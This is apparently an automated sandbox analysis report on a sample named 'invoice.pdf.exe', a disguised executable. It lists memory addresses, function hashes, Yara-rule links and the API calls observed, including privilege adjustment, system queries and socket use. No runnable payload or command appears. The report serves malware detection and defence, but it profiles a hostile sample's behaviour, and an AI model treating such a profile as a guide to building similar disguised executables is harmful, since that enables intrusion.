0x000bb5d0
0x000bb5d2
0x000bb5d5
0x000bb5d7
0x000bb5dc
0x000bb5de
0x000bb5df
0x000bb5e1
0x000bb5e2
0x000bb5e4
0x000bb5e9
0x000bb5eb
0x000bb5ec
0x000bb5ee
0x000bb5f0
0x000bb5f2
0x000bb5f5
0x000bb5f7
0x000bb5fa
0x000bb5fc
0x000bb5fe
0x000bb601
0x000bb603
0x000bb604
0x00000000
0x000bb604
0x000bb5ba
0x000bb4fe
0x000bb4fe
0x000bb4ff
0x000bb501
0x000bb506
0x000bb509
0x000bb50a
0x000bb50c
0x000bb511
0x000bb514
0x00000000
0x000bb514
0x000bb4fc
0x000bb4f8
0x000bb4a5
0x000bb42c
0x000bb42c
0x000bb431
0x000bb433
0x000bb435
0x000bb438
0x000bb438
0x000bb43a
0x000bb43b
0x00000000
0x000bb43d
0x000bb43d
0x00000000
0x000bb43d
0x000bb43b
0x000bb42a
0x000bb40a
0x000bb406
0x000bb3e8
0x000bb3d7
0x000bb348
0x000bb348
0x000bb349
0x000bb34b
0x000bb34d
0x000bb350
0x000bb353
0x000bb354
0x000bb355
0x000bb356
0x000bb358
0x000bb35a
0x000bb35d
0x000bb35f
0x000bb360
0x000bb363
0x000bb365
0x000bb36a
0x000bb36c
0x000bb36d
0x000bb372
0x000bb374
0x000bb377
0x000bb379
0x00000000
0x000bb379
0x000bb346
0x000bb342
0x000bb2d4
0x000bb2d4
0x00000000
0x000bb2d4
0x000bb2d2
0x000bb2c6
0x000bb2ba
0x000bb2ae
0x000bb2a2
0x000bb296
0x000bb6ca
0x000bb6cc
0x000bb6cf
0x000bb6d4
0x000bb6d6
0x000bb6d7
0x000bb6d8
0x000bb6d9
0x000bb6db
0x000bb6dd
0x000bb6df
0x000bb6e0
0x000bb6e2
0x000bb6e4
0x000bb6e5
0x000bb6e7
0x000bb6e7
0x000bb6e8
0x000bb6e9
0x000bb6ea
0x000bb6eb
0x000bb6ed
0x000bb6ef
0x000bb6f2
0x000bb6f4
0x000bb6f6
0x000bb6f7
0x000bb6fa
0x000bb6fb
0x000bb6fc
0x000bb6fd
0x000bb6ff
0x000bb701
0x000bb703
0x000bb704
0x000bb706
0x000bb708
0x000bb709
0x000bb70b
0x000bb70b
0x000bb70c
0x000bb70d
0x000bb70e
0x000bb70f
0x000bb711
0x000bb713
0x000bb715
0x000bb716
0x000bb718
0x000bb71a
0x000bb71b
0x000bb71e
0x000bb71f
0x000bb720
0x000bb721
0x000bb723
0x000bb725
0x000bb72a
0x000bb754
0x000bb758
0x000bb75a
0x000bb75d
0x000bb75f
0x000bb761
0x000bb763
0x000bb765
0x000bb767
0x000bb769
0x000bb76b
0x000bb76e
0x000bb770
0x000bb772
0x000bb773
0x000bb775
0x000bb777
0x000bb779
0x000bb77b
0x000bb77d
0x000bb780
0x000bb784
0x000bb785
0x000bb787
0x000bb788
0x000bb789
0x000bb78a
0x000bb78c
0x000bb78e
0x000bb790
0x00000000
0x000bb792
0x000bb792
0x000bb793
0x000bb793
0x000bb793
0x000bb796
0x00000000
0x000bb798
0x000bb798
0x000bb799
0x000bb799
0x000bb79c
0x000bb79d
0x000bb79f
0x000bb7a0
0x000bb7a1
0x000bb7a2
0x000bb7a4
0x000bb7a6
0x000bb7a7
0x000bb7ab
0x000bb7af
0x000bb7b1
0x000bb7b3
0x000bb7b6
0x000bb7b8
0x000bb7b8
0x000bb796
0x000bb790
0x000bb72c
0x000bb72c
0x000bb72d
0x000bb72f
0x000bb731
0x000bb731
0x000bb731
0x000bb736
0x000bb737
0x000bb737
0x000bb737
0x000bb7be
0x000bb7c2
0x000bb7c4
0x000bb7c6
0x000bb7c8
0x000bb7c9
0x000bb7cb
0x000bb7ce
0x000bb7d0
0x000bb7d2
0x000bb7d3
0x000bb7d5
0x000bb7d7
0x000bb7d9
0x000bb7db
0x000bb7dd
0x000bb7e0
0x000bb7e2
0x000bb7e2
0x000bb7e4
0x000bb7e4
0x000bb7e5
0x000bb7e7
0x000bb7e8
0x000bb7e9
0x000bb7ea
0x000bb7ea
0x000bb7ec
0x000bb7ee
0x000bb7f0
0x00000000
0x000bb7f2
0x000bb7f2
0x000bb7f4
0x000bb7f6
0x00000000
0x000bb7f8
0x000bb7f8
0x000bb7fc
0x000bb7fd
0x000bb7ff
0x000bb800
0x000bb801
0x000bb802
0x000bb804
0x000bb806
0x000bb808
0x000bb80b
0x000bb80d
0x000bb80f
0x000bb811
0x000bb813
0x000bb815
0x000bb817
0x000bb819
0x000bb819
0x000bb7f6
0x000bb7f0
0x000bb81a
0x000bb81c
0x000bb81e
0x000bb820
0x000bb822
0x000bb823
0x000bb825
0x000bb827
0x000bb829
0x000bb82b
0x000bb82d
0x000bb830
0x000bb834
0x000bb835
0x000bb837
0x000bb838
0x000bb839
0x000bb83a
0x000bb83c
0x000bb83e
0x000bb840
0x00000000
0x000bb842
0x000bb842
0x000bb844
0x000bb846
0x00000000
0x000bb848
0x000bb848
0x000bb84c
0x000bb84d
0x000bb84f
0x000bb850
0x000bb851
0x000bb852
0x000bb854
0x000bb856
0x000bb858
0x000bb85b
0x000bb85f
0x000bb861
0x000bb863
0x000bb866
0x000bb868
0x000bb868
0x000bb846
0x000bb840
0x000bb86e
0x000bb872
0x000bb874
0x000bb876
0x000bb879
0x000bb87b
0x000bb87d
0x000bb881
0x000bb883
0x000bb885
0x000bb885
0x000bb885
0x000bb887
0x000bb889
0x000bb88b
0x000bb88b
0x000bb88c
0x000bb88e
0x000bb894
0x000bb898
0x000bb89a
0x000bb89c
0x000bb89f
0x000bb8a1
0x000bb8a3
0x000bb8a7
0x000bb8a9
0x000bb8ab
0x000bb8ad
0x000bb8af
0x000bb8b1
0x000bb8b3
0x000bb8b5
0x000bb8b7
0x000bb8ba
0x000bb8bc
0x000bb8be
0x000bb8bf
0x000bb8c1
0x000bb8c3
0x00000000
0x00000000
0x000bb8c5
0x000bb8c7
0x000bb8c9
0x000bb8cc
0x000bb8d0
0x000bb8d1
0x000bb8d3
0x000bb8d4
0x000bb8d5
0x000bb8d6
0x000bb8d8
0x000bb8da
0x000bb8dc
0x00000000
0x000bb8de
0x000bb8de
0x000bb8e0
0x000bb8e1
0x000bb8e1
0x000bb8e1
0x000bb988
0x000bb988
0x000bb988
0x000bb906
0x000bb906
0x000bb908
0x000bb909
0x000bb90b
0x000bb90b
0x000bb90c
0x000bb90d
0x000bb90e
0x000bb90f
0x000bb910
0x000bb913
0x000bb914
0x000bb915
0x000bb917
0x000bb919
0x000bb91a
0x000bb91d
0x000bb920
0x000bb924
0x000bb926
0x000bb928
0x000bb92a
0x000bb92c
0x000bb92d
0x000bb92f
0x000bb932
0x000bb934
0x000bb936
0x00000000
0x000bb938
0x000bb938
0x000bb93e
0x000bb940
0x000bb942
0x000bb943
0x000bb944
0x000bb946
0x000bb946
0x000bb948
0x000bb94c
0x000bb94e
0x000bb94f
0x000bb94f
0x000bb950
0x000bb950
0x000bb948
0x00000000
0x000bb936
0x000bb88b
0x000bb885
0x000bb243
0x000bb243
0x000bb245
0x000bb247
0x000bb249
0x000bb24a
0x000bb24c
0x00000000
0x000bb24c
0x000bb21a
0x000bb21c
0x000bb21e
0x000bb220
0x000bb225
0x000bb228
0x000bb22c
0x000bb230
0x000bb233
0x000bb235
0x000bb238
0x000bb23a
0x000bb23c
0x000bb23d
0x000bb23f
0x000bb241
0x00000000
0x000bb241
0x000bb08d
0x000bb07c
0x000bb034
0x00000000
0x000bb005
0x000badf9
0x000bad9f
0x000bada0
0x000bada2
0x000bada4
0x000bada6
0x00000000
0x000bada6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.239855860.00000000000B2000.00000002.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000001.00000002.239850609.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.239910708.000000000012A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43d4b4083e517fade2c14928ff996efba4ba7e5714ef4cc44935a734bbb923a
Instruction ID: 0fdf4ff85e72d979ff50dd791a6502f8b8391e6b6e0dcbe469857538a7523efe
Opcode Fuzzy Hash: d43d4b4083e517fade2c14928ff996efba4ba7e5714ef4cc44935a734bbb923a
Instruction Fuzzy Hash: 55E2562100EBC29FD7134BB899756E1BFB5AE5322430E08D7D4C08F5B3E2151A6ADB76

Uniqueness

Uniqueness Score: -1.00%

Function 048E81AE, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c07d7cf4a1dbc9ecbcb2ead08c0c732c038fcb5da9e7a68682e3ab765a6fd4c5
Instruction ID: 5becc7283f6cedfb5a1eba3c45c6d4ef109c9ed57229f81da69cbab19406f936
Opcode Fuzzy Hash: c07d7cf4a1dbc9ecbcb2ead08c0c732c038fcb5da9e7a68682e3ab765a6fd4c5
Instruction Fuzzy Hash: 53A18EB0E056288BDBA4DF69D9847DCBBF1EF49300F1085D9D188EB205E7359A99CF06

Uniqueness

Uniqueness Score: -1.00%

Function 048E5367, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d589c7671e14af208fab32e19a6ed3db8603cafe1c76f8306578d2ff23ab4071
Instruction ID: 9a832f89e80abee88d74b5c9999efaa4f781b5bf10c0e2626527881e249d6111
Opcode Fuzzy Hash: d589c7671e14af208fab32e19a6ed3db8603cafe1c76f8306578d2ff23ab4071
Instruction Fuzzy Hash: 73511070904649CFE748EF7AE841B9DBBB6FB85308F14C129D00897269EF742946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 048E5368, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ce240c3e8e6bc20cb3afb57f28566f83412eba0a0fec51667914f97e25518a
Instruction ID: 2f22d97f4cbb43b057487ff4d143ddf45632ff96603666ba28012a0a31a00431
Opcode Fuzzy Hash: 94ce240c3e8e6bc20cb3afb57f28566f83412eba0a0fec51667914f97e25518a
Instruction Fuzzy Hash: 4A511070904649CFE748EF7AE841B9DBBB6FB85308F14C129D00897269EF742906CB51

Uniqueness

Uniqueness Score: -1.00%

Function 048E55B0, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ee6b13a68427a44735f3a6826e4fff002442f453bf37b20b6cf69970af4f81
Instruction ID: 5932c333f538d961746de6ac47382b4090680ecd35694ca5f76e7f25779d968d
Opcode Fuzzy Hash: b0ee6b13a68427a44735f3a6826e4fff002442f453bf37b20b6cf69970af4f81
Instruction Fuzzy Hash: 7B4144B1E056588BEB5CCF6B8D406DEFAF7AFC9304F14C5BA850DAA214EB7005858F54

Uniqueness

Uniqueness Score: -1.00%

Function 048ECE71, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2779766aeb27b2a8d50f38c2e4b044eb5e1bc3787a5ba227e50fb4dfa3e3c97a
Instruction ID: 136d5001499b49376ac1493b1a5f347b97e8b1a457738d12d797d8be6592a0d8
Opcode Fuzzy Hash: 2779766aeb27b2a8d50f38c2e4b044eb5e1bc3787a5ba227e50fb4dfa3e3c97a
Instruction Fuzzy Hash: 14110370D442599ECB10DFB5D858BFEBFF0AB0A300F24556AE405F3281D7749A44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 048EBF88, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a839ff52ab691f4485bf177c5d64801ccd87127acf61193e299049c361ffb3e
Instruction ID: 8856694a872d65bc8abefc8c0c814ecee7d5fc8d8b8c089a783cb92f04263bf6
Opcode Fuzzy Hash: 9a839ff52ab691f4485bf177c5d64801ccd87127acf61193e299049c361ffb3e
Instruction Fuzzy Hash: 0321A871D056698BEB28CF5BC8443DABAB3AFC5304F14C5AAC808AB254EB704989CF50

Uniqueness

Uniqueness Score: -1.00%

Function 048EBF98, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f550235cb28eaba1cb9fe0dcb07a4f93d79112578dc85b39714ae59f1222ff6f
Instruction ID: 116e140b99f21904447a26da86702a2cfa11812195219de41bf19f270fdede41
Opcode Fuzzy Hash: f550235cb28eaba1cb9fe0dcb07a4f93d79112578dc85b39714ae59f1222ff6f
Instruction Fuzzy Hash: D721C971D056698BEB28CF6BCC0479EBAF3ABC9300F04C5BAC80DA6254EB741985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 048ECE80, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e8b16ba2cbae9a94485b31675f59fc8fdbe2d4e3177ee08fb3731df8c64b7f
Instruction ID: 2ed408db0b3491d16c7385b34b391660a016dee48b90cd9c2dfd0c26365afa4b
Opcode Fuzzy Hash: 68e8b16ba2cbae9a94485b31675f59fc8fdbe2d4e3177ee08fb3731df8c64b7f
Instruction Fuzzy Hash: 5D11D2B0D442599EDB54DFAAD844BFEBEF0AB4A300F14946AE405F3280D7749A40DF68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: invoice.pdf.exe PID: 6580 Parent PID: 6496 invoice.pdf.exeCOMMON

Executed Functions

Function 01A03A88, Relevance: 2.7, APIs: 1, Instructions: 1218libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c939057e33b7c3ccd11683ed082afd2ef978ed057436fa8bc040dae97f95b4f3
Instruction ID: 4d73a99046e54dc1f64d5bc5f9e38df8531a923642cde348f53ea063c9da9bbc
Opcode Fuzzy Hash: c939057e33b7c3ccd11683ed082afd2ef978ed057436fa8bc040dae97f95b4f3
Instruction Fuzzy Hash: 1EC2A574A006298FCB65DF68DD54AAEBBF6BF48302F1080E6D909A7354DB349E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0632F3F8, Relevance: 2.3, APIs: 1, Instructions: 829libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0632FB4D

Memory Dump Source

Source File: 00000002.00000002.509917703.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4726625e0236c713cca7a319ea27059ee7bf433470131992ab296aeb9c9c4469
Instruction ID: 9ff4661eea8febf40ff8315ec1878ce1ba6a62f0b48bbd885e93c6324c1a1a27
Opcode Fuzzy Hash: 4726625e0236c713cca7a319ea27059ee7bf433470131992ab296aeb9c9c4469
Instruction Fuzzy Hash: 3F623C35E002299FDF25DF64CC58B9EB7F2AF89300F1181A9E909AB254DB719D85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 016BAF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 016BAF87

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 471b3ab796f72fdf522b98b5a3a78f3723316fbaaf9604d5704826a188f72460
Instruction ID: e0049c97a0bcada18a23de186e14e982c0e54f4dc8cd97ed122846048817b4ce
Opcode Fuzzy Hash: 471b3ab796f72fdf522b98b5a3a78f3723316fbaaf9604d5704826a188f72460
Instruction Fuzzy Hash: 3621B1755093809FDB138F29DC80B92BFB8EF06210F08849AE9848F5A3D3359808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 016BB089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 016BB0F5

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 12af96cbbaf382c98449d5f9d6fc8ae8b9956984d20a5d0de4f9a665c0c165a7
Instruction ID: bfb9813a894cfd84f20ef51955ff3b22626b15797069443755b5cf7864247077
Opcode Fuzzy Hash: 12af96cbbaf382c98449d5f9d6fc8ae8b9956984d20a5d0de4f9a665c0c165a7
Instruction Fuzzy Hash: 31118E724093C09FDB228F15DC85A92FFB4EF16314F0984DAE9848B663D275A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 016BAF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 016BAF87

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4942df1a2ce41c1cb9efaa7f42bc823e670734e25ffec557c3c664676c9e48bc
Instruction ID: fe09a4ad149f78bd5299620f2fff42009cd2ebcbc06f759808ae64dbf20cc304
Opcode Fuzzy Hash: 4942df1a2ce41c1cb9efaa7f42bc823e670734e25ffec557c3c664676c9e48bc
Instruction Fuzzy Hash: 80115E755002409FDB21CF99EC84BA6FBE8EF04220F08846AED458B652D375E458CF71

Uniqueness

Uniqueness Score: -1.00%

Function 016BA09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 016BA0D5

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 2b8da4dffdf04c3778f7d6ad8a199c3137243e911e610e0440d6eec1265bfef8
Instruction ID: ce6cd33881db161dbd105d54a336e149d7ae81bbec1f51872c1c7eed63829929
Opcode Fuzzy Hash: 2b8da4dffdf04c3778f7d6ad8a199c3137243e911e610e0440d6eec1265bfef8
Instruction Fuzzy Hash: CF01B1314003409FDB21CF99EC84BA6FBA0EF04324F08C4AADD498B612D375A058CF72

Uniqueness

Uniqueness Score: -1.00%

Function 016BB0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 016BB0F5

Memory Dump Source

Source File: 00000002.00000002.503160426.00000000016BA000.00000040.00000001.sdmp, Offset: 016BA000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: f4c77a2951e2ff8b09b1b292b57afbb3d66e9c7d46595d9aabec7e3bfc9ea5da
Instruction ID: 97271de374759a7e2c5aab332842b3e0f7f07735ba968b11f2b0b52d7a38588b
Opcode Fuzzy Hash: f4c77a2951e2ff8b09b1b292b57afbb3d66e9c7d46595d9aabec7e3bfc9ea5da
Instruction Fuzzy Hash: 8A018B359002409FDB218F49EC84BA6FFA0EF08721F08C4AADD894B612C375A459CF72

Uniqueness

Uniqueness Score: -1.00%

Function 01A03AB8, Relevance: 2.2, APIs: 1, Instructions: 689libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0947a5a61be4eff44e5458caf4162cf0376a8157b7fa25db4198e2d376722785
Instruction ID: bf69d824d0a9143987bbbb979a5ff541ca8b67eb558ce62d199a2b7693b9528b
Opcode Fuzzy Hash: 0947a5a61be4eff44e5458caf4162cf0376a8157b7fa25db4198e2d376722785
Instruction Fuzzy Hash: D5729378E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01A03B03, Relevance: 2.2, APIs: 1, Instructions: 679libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d50013d244104f131ebd699830189da26c16a9d4538a3b5df6588f0b6effbc2
Instruction ID: cc233608064ee7e6392b76db4629f95645a3b044307166bd6387b28cdf95b27f
Opcode Fuzzy Hash: 1d50013d244104f131ebd699830189da26c16a9d4538a3b5df6588f0b6effbc2
Instruction Fuzzy Hash: 53729478E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01A03B4E, Relevance: 2.2, APIs: 1, Instructions: 671libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59eda391389658bbeac3a397685f34e92b456a0ce563ce1a5c222d78c14f7f06
Instruction ID: 1a14bfc392712ad591a7f899221a3d4a895a8e1946d6cc7eb67be94d86f42938
Opcode Fuzzy Hash: 59eda391389658bbeac3a397685f34e92b456a0ce563ce1a5c222d78c14f7f06
Instruction Fuzzy Hash: 7B729478E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01A03BA2, Relevance: 2.2, APIs: 1, Instructions: 661libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e7307788873b9b6a6d08e518350d5727f8990d18d9206d75c184c0823caa99f
Instruction ID: bcd97a28a447b60cc87a72d024d00c12baa1a276102be6cf66d57a29509b20ce
Opcode Fuzzy Hash: 1e7307788873b9b6a6d08e518350d5727f8990d18d9206d75c184c0823caa99f
Instruction Fuzzy Hash: 9C729478E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01A03BF6, Relevance: 2.2, APIs: 1, Instructions: 651libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3b871e9bc7d6e1dbfe34f5f61ea14334ba03b4a2df066dc5a14436a900b0ce6
Instruction ID: 4624162f320a44ea15b3880f5a5d3f3674eab4fe2689c8f5cf4d5474d0ac3850
Opcode Fuzzy Hash: c3b871e9bc7d6e1dbfe34f5f61ea14334ba03b4a2df066dc5a14436a900b0ce6
Instruction Fuzzy Hash: 8B629478E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01A03C4A, Relevance: 2.1, APIs: 1, Instructions: 641libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a0ff3e3ad0317742a5a7c484b0bde34c4676f3ec21aebb570d2deeecfe218859
Instruction ID: 578d52eb51cfd978ac4dd047bc67d623881d73c60a6e434ecfbbca9eda9ba2f6
Opcode Fuzzy Hash: a0ff3e3ad0317742a5a7c484b0bde34c4676f3ec21aebb570d2deeecfe218859
Instruction Fuzzy Hash: 24629478E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 01A03C9E, Relevance: 2.1, APIs: 1, Instructions: 631libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A03DD3

Memory Dump Source

Source File: 00000002.00000002.504312827.0000000001A00000.00000040.00000001.sdmp, Offset: 01A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32ba4716e6d5e0d40c376febbc889615542e889aaed9eaee808d3b33f26d6e83
Instruction ID: 0b6a6d4c766f2dd176fb45fe07c91f33149ff3352ef331484761d571bbff02ae
Opcode Fuzzy Hash: 32ba4716e6d5e0d40c376febbc889615542e889aaed9eaee808d3b33f26d6e83
Instruction Fuzzy Hash: 15629478E106298FCB61DF68DD54AA9BBF1BF48312F1481E6A909E3354DB349E81CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0632C56F, Relevance: 1.7, APIs: 1, Instructions: 209libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0632C685

Memory Dump Source

Source File: 00000002.00000002.509917703.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d2ec9b37dc65f5657f499730c88af0d76f37268b0c979bec8666b347e884869
Instruction ID: 6101be508529c93f0099e759ed7e4fba0078d373e3bdf5ddfa222f5a01fba518
Opcode Fuzzy Hash: 3d2ec9b37dc65f5657f499730c88af0d76f37268b0c979bec8666b347e884869
Instruction Fuzzy Hash: 7771B030B003469FDB419BB4D854AAE7BF6EF85304F25956AE406DB295EB34EC05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0632ED98, Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0632EDD8

Memory Dump Source

Source File: 00000002.00000002.509917703.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23f4fc1e01b86e39aba3e21d5f7eb0f2cada279e1a8f88333f67c9ce6de07fba
Instruction ID: 42901f1e694c8c6e6afda656ff67aa45b4a6d85903f4028739922dc63f52f76a
Opcode Fuzzy Hash: 23f4fc1e01b86e39aba3e21d5f7eb0f2cada279e1a8f88333f67c9ce6de07fba
Instruction Fuzzy Hash: 20716B30B0021ADFDB54DBB4E899AAEBBF2BF84315F15C428D406E7384DB34A845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0632C620, Relevance: 1.7, APIs: 1, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0632C685

Memory Dump Source

Source File: 00000002.00000002.509917703.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63871a9006374aac95fa03f533e814eadfdabb4508352d62ee47e14f837776a0
Instruction ID: 4704d9d77bf0db642b4d2a287b6e9b22a00127075f9c8a8fbdbf0fbed8626c13
Opcode Fuzzy Hash: 63871a9006374aac95fa03f533e814eadfdabb4508352d62ee47e14f837776a0
Instruction Fuzzy Hash: FD516230B0020A9FCB50EBB4D994AAEB7F6FB84304F14852DE506DB244EF31A845CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06091D0D, Relevance: 1.6, APIs: 1, Instructions: 110networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 06091DD6

Memory Dump Source

Source File: 00000002.00000002.509856133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 7bf2f4c0d241dcfe7cab67e8002d983a0186df7b4957b11bc13c5d55d463292b
Instruction ID: ba0cb13e378d9e8be995b3f9761b8a613b677938fbcc272696482ad857172a4a
Opcode Fuzzy Hash: 7bf2f4c0d241dcfe7cab67e8002d983a0186df7b4957b11bc13c5d55d463292b
Instruction Fuzzy Hash: BE416B7150E7C0AFD7638B25CC54A56BFB5AF07210F1985DBE9C48F1A3C225A808DB72

Uniqueness

Uniqueness Score: -1.00%

Function 06092790, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E2C,10C26EF0,00000000,00000000,00000000,00000000), ref: 06092824

Memory Dump Source

